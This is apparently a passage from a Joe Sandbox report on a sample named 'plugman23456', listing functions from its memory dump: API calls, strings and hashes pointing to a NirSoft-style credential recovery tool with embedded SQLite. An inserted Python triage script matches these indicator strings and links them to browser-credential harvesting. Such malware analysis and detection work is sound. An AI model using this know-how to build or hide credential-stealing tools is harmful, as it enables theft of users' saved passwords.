                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                          APIs
                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                          • KillTimer.USER32(?,00000041), ref: 004060D7
                          • KillTimer.USER32(?,00000041), ref: 004060E8
                          • GetTickCount.KERNEL32 ref: 0040610B
                          • GetParent.USER32(?), ref: 00406136
                          • SendMessageW.USER32(00000000), ref: 0040613D
                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                          • String ID: A
                          • API String ID: 2892645895-3554254475
                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                          APIs
                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                          • GetDesktopWindow.USER32 ref: 0040D9FD
                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                          • memset.MSVCRT ref: 0040DA23
                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                          • String ID: caption
                          • API String ID: 973020956-4135340389
                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                          APIs
                          Strings
                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_snwprintf$wcscpy
                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                          • API String ID: 1283228442-2366825230
                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                          APIs
                          • wcschr.MSVCRT ref: 00413972
                          • wcscpy.MSVCRT ref: 00413982
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                          • wcscpy.MSVCRT ref: 004139D1
                          • wcscat.MSVCRT ref: 004139DC
                          • memset.MSVCRT ref: 004139B8
                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                          • memset.MSVCRT ref: 00413A00
                          • memcpy.MSVCRT ref: 00413A1B
                          • wcscat.MSVCRT ref: 00413A27
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                          • String ID: \systemroot
                          • API String ID: 4173585201-1821301763
                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy
                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                          • API String ID: 1284135714-318151290
                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                          • String ID: 0$6
                          • API String ID: 4066108131-3849865405
                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                          APIs
                          • memset.MSVCRT ref: 004082EF
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                          • memset.MSVCRT ref: 00408362
                          • memset.MSVCRT ref: 00408377
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ByteCharMultiWide
                          • String ID:
                          • API String ID: 290601579-0
                          • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                          • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memchrmemset
                          • String ID: PD$PD
                          • API String ID: 1581201632-2312785699
                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                          APIs
                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                          • GetDC.USER32(00000000), ref: 00409F6E
                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                          • GetParent.USER32(?), ref: 00409FA5
                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                          • String ID:
                          • API String ID: 2163313125-0
                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$wcslen
                          • String ID:
                          • API String ID: 239872665-3916222277
                          • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                          • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpywcslen$_snwprintfmemset
                          • String ID: %s (%s)$YV@
                          • API String ID: 3979103747-598926743
                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                          APIs
                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                          • wcslen.MSVCRT ref: 0040A6B1
                          • wcscpy.MSVCRT ref: 0040A6C1
                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                          • wcscpy.MSVCRT ref: 0040A6DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                          • String ID: Unknown Error$netmsg.dll
                          • API String ID: 2767993716-572158859
                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                          APIs
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          • wcscpy.MSVCRT ref: 0040DAFB
                          • wcscpy.MSVCRT ref: 0040DB0B
                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfilewcscpy$AttributesFileString
                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                          • API String ID: 3176057301-2039793938
                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                          APIs
                          Strings
                          • unable to open database: %s, xrefs: 0042F84E
                          • out of memory, xrefs: 0042F865
                          • cannot ATTACH database within transaction, xrefs: 0042F663
                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                          • too many attached databases - max %d, xrefs: 0042F64D
                          • database %s is already in use, xrefs: 0042F6C5
                          • database is already attached, xrefs: 0042F721
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                          • API String ID: 1297977491-2001300268
                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
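The string listings in the two blocks above are the most useful triage signal in this part of the report: the HTML template with the `http://www.nirsoft.net/` link and the `TranslatorName`/`TranslatorURL`/`rtl` INI keys are the NirSoft report and language-file conventions, the shell-folder names come from the `wcscpy` block, and the ATTACH messages are SQLite's own `attach.c` error strings, which fits the browser-credential harvesting flagged in the signature list (Chrome and Firefox keep their login data in SQLite files). The following script is an added example, not part of the Joe Sandbox report or of the analysed sample: it scans a raw memory dump for exactly those strings, in both ANSI and UTF-16LE form, and reports which indicator families are present. The indicator lists are copied from the `String ID` entries on this page; the dump fragment it scans is constructed for the demonstration and is not the real `0x400000` dump; the family names and verdict labels are this example's own.

```python
"""Triage helper: scan a memory dump for the indicator strings seen above.

Added example, not part of the Joe Sandbox report. The indicator strings are
copied from the 'Strings' / 'String ID' entries in this section; the sample
dump built below is CONSTRUCTED for the demonstration, not the real 0x400000
memory dump from the analysis.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Indicator families taken from the function string listings in the report.
INDICATORS: dict[str, list[str]] = {
    # NirSoft-style HTML report template (xrefs 00410A70..00410B3C)
    "nirsoft_html_report": [
        '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
        "http://www.nirsoft.net/",
        '<table dir="rtl"><tr><td>',
    ],
    # NirSoft language-file keys read via GetPrivateProfile*W (ref 0040DB1C)
    "nirsoft_lng_ini": ["TranslatorName", "TranslatorURL", "charset", "rtl"],
    # Embedded SQLite: attach.c error messages (xrefs 0042F64D..0042F865)
    "sqlite_attach": [
        "cannot ATTACH database within transaction",
        "too many attached databases - max %d",
        "database is already attached",
        "attached databases must use the same text encoding as main database",
    ],
    # Shell-folder enumeration (wcscpy block, String ID list)
    "shell_folders": ["Common Startup", "Common Start Menu", "Favorites", "Startup"],
}


@dataclass
class Hit:
    family: str
    needle: str
    encoding: str  # "ascii" or "utf-16le"
    offset: int


@dataclass
class TriageResult:
    hits: list[Hit] = field(default_factory=list)

    def families(self) -> set[str]:
        return {h.family for h in self.hits}

    def verdict(self) -> str:
        # Verdict labels are this example's own wording, not report output.
        fams = self.families()
        if {"nirsoft_html_report", "sqlite_attach"} <= fams:
            return "nirsoft-style credential recovery tool with embedded SQLite"
        if "nirsoft_html_report" in fams or "nirsoft_lng_ini" in fams:
            return "nirsoft-style utility"
        if "sqlite_attach" in fams:
            return "embedded sqlite only"
        return "no indicator match"


def scan_dump(dump: bytes) -> TriageResult:
    """Search `dump` for every indicator in both ANSI and UTF-16LE form.

    The HTML template and INI keys flow through wide-char APIs (_snwprintf,
    GetPrivateProfileStringW), so in memory they are usually UTF-16LE only;
    SQLite's messages are plain ANSI. Checking both forms avoids missing one.
    """
    result = TriageResult()
    for family, needles in INDICATORS.items():
        for needle in needles:
            for enc_name, pattern in (("ascii", needle.encode("ascii")),
                                      ("utf-16le", needle.encode("utf-16-le"))):
                for m in re.finditer(re.escape(pattern), dump):
                    result.hits.append(Hit(family, needle, enc_name, m.start()))
    return result


def build_sample_dump() -> bytes:
    """CONSTRUCTED dump fragment mimicking how these strings sit in memory."""
    filler = b"\x00" * 16
    parts = [
        b"MZ\x90\x00" + b"\x00" * 60,  # stand-in for the PE header at 0x400000
        b"cannot ATTACH database within transaction" + filler,
        b"database is already attached" + filler,
        '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'.encode("utf-16-le") + filler,
        "http://www.nirsoft.net/".encode("utf-16-le") + filler,
        "TranslatorName".encode("utf-16-le") + filler,
        "Common Startup".encode("utf-16-le") + filler,
    ]
    return b"".join(parts)


if __name__ == "__main__":
    res = scan_dump(build_sample_dump())
    for h in sorted(res.hits, key=lambda h: h.offset):
        print(f"{h.offset:#08x} {h.encoding:9} {h.family:22} {h.needle[:50]!r}")
    print("verdict:", res.verdict())
```

To use it on the actual artefact, read the `.sdmp` file listed under `Memory Dump Source` into `bytes` and pass it to `scan_dump`; the offsets it prints are relative to the dump start, so add the `Offset: 00400000` base to compare them with the `xrefs` addresses in the report. Matching both encodings matters: a scanner that only looks for ASCII would see the SQLite strings but miss the NirSoft template entirely.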
                          APIs
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                          • memcpy.MSVCRT ref: 0040EB80
                          • memcpy.MSVCRT ref: 0040EB94
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                          • String ID: ($d
                          • API String ID: 1140211610-1915259565
                          • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                          • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                          APIs
                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                          • Sleep.KERNEL32(00000001), ref: 004178E9
                          • GetLastError.KERNEL32 ref: 004178FB
                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$ErrorLastLockSleepUnlock
                          • String ID:
                          • API String ID: 3015003838-0
                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                          APIs
                          • memset.MSVCRT ref: 00407E44
                          • memset.MSVCRT ref: 00407E5B
                          • _mbscpy.MSVCRT ref: 00407E7E
                          • _mbscpy.MSVCRT ref: 00407ED7
                          • _mbscpy.MSVCRT ref: 00407EEE
                          • _mbscpy.MSVCRT ref: 00407F01
                          • wcscpy.MSVCRT ref: 00407F10
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                          • String ID:
                          • API String ID: 59245283-0
                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                          APIs
                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                          • GetLastError.KERNEL32 ref: 0041855C
                          • Sleep.KERNEL32(00000064), ref: 00418571
                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                          • GetLastError.KERNEL32 ref: 0041858E
                          • Sleep.KERNEL32(00000064), ref: 004185A3
                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                          • String ID:
                          • API String ID: 3467550082-0
                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                          • API String ID: 3510742995-3273207271
                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                          • memset.MSVCRT ref: 00413ADC
                          • memset.MSVCRT ref: 00413AEC
